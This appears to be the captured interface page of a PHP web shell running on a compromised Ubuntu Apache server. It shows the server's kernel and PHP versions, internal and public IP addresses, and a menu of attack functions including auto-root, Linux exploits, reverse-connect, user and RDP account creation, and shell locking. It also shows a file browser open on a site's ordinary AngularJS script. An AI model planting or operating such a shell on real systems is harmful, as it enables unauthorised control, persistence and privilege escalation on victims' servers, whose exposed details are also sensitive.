Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.139.86.74
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
kop /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
angular-ui-router.min.js
29.16
KB
-rwxr-xr-x
angular.min.js
104.98
KB
-rwxr-xr-x
bootstrap.js
65.96
KB
-rwxr-xr-x
bootstrap.min.js
35.11
KB
-rwxr-xr-x
jquery-1.11.3.min.js
93.71
KB
-rwxr-xr-x
jquery.3.5.min.js
87.38
KB
-rwxr-xr-x
jquery.flexslider-min.js
42.48
KB
-rwxr-xr-x
lightbox-plus-jquery.min.js
90.9
KB
-rwxr-xr-x
lightbox.min.js
8.12
KB
-rwxr-xr-x
npm.js
484
B
-rwxr-xr-x
script.js
1.74
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : script.js
var thankam = angular.module('thankam',['ui.router']); var url = 'http://localhost/learning/le-admin/'; thankam.config(['$urlRouterProvider', '$stateProvider', function($urlRouterProvider, $stateProvider){ $urlRouterProvider.otherwise('/'); $stateProvider .state('home',{ url:'/', templateUrl: 'template/home.html' }) $stateProvider .state('about',{ url:'/about', templateUrl: 'template/about.html' }) $stateProvider .state('support',{ url:'/support', templateUrl: 'template/support.html' }) $stateProvider .state('gallery',{ url:'/gallery', templateUrl: 'template/gallery.html' }) $stateProvider .state('testimony',{ url:'/testimony', templateUrl: 'template/testimony.html' }) $stateProvider .state('contact',{ url:'/contact', templateUrl: 'template/contact.html' }) $stateProvider .state('news',{ url:'/news', templateUrl: 'template/news.html' }) $stateProvider .state('payment',{ url:'/payment', templateUrl: 'template/payment.html' }) }]) thankam.controller('homeCtrl', function($scope, $http){ }) $(window).load(function() { $('.flexslider').flexslider({ animation: "slide" }); }); function changeSelect(i){ $(".mom").removeClass('sel'+i); $("#mm"+i).addClass('sel'+i); } function showSM(){ $("#sm-menu").show(500); } function hideSM(){ $("#sm-menu").hide(); }
Close